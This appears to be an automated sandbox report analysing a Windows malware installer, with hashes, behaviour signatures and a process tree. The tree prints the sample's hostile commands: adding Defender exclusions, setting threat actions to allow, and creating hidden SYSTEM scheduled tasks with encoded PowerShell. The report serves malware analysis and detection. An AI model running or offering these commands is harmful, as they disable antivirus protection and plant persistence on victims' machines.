Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
01-07-2024 05:09
General
-
Target
daf394a884373933c9e68b41ced73ddd8fc457fe4549383f1001b5c92513df2f.exe
-
Size
7.2MB
-
MD5
8b9df0340b2a1611b2b7e82ed054211c
-
SHA1
12e943907a0a80311c2243b1a46ede6cfc713cf6
-
SHA256
daf394a884373933c9e68b41ced73ddd8fc457fe4549383f1001b5c92513df2f
-
SHA512
a5ecfee1331d7b89395d263d473e3ca5841e3890f87f4237cb95d97ab14d367badd6a5f163ab4b77c13b07bb196407bd637f4db80e5cf2cae8222512fe4491e8
-
SSDEEP
98304:91OW6BwmsgIlJ8Pa7YXHdP9o57Tbc4IjcEg+byhmWn7OMbrDbQPWMCvq/TgRVDZg:91OW61keP4YwBbWjcEg+blWbwEDZTs
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 33 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\daf394a884373933c9e68b41ced73ddd8fc457fe4549383f1001b5c92513df2f.exe"C:\Users\Admin\AppData\Local\Temp\daf394a884373933c9e68b41ced73ddd8fc457fe4549383f1001b5c92513df2f.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6FF0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exe.\Install.exe /FdidQOvZ "385137" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bBfKaGDnIKdTdJZScE" /SC once /ST 05:10:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exe\" pa /QDdiddq 385137 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4988 -s 7964⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS7251.tmp\Install.exe pa /QDdiddq 385137 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzlLRIVGE" /SC once /ST 03:07:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzlLRIVGE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzlLRIVGE"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QVuDljbAZykxnpoWI" /SC once /ST 04:02:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\qVqqalb.exe\" Cc /hBBqdidvI 385137 /S" /V1 /F2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QVuDljbAZykxnpoWI"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1504 -s 7882⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\qVqqalb.exeC:\Windows\Temp\XwIFwyvoUqntekhn\ooWCIvMMypBCeYz\qVqqalb.exe Cc /hBBqdidvI 385137 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bBfKaGDnIKdTdJZScE"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
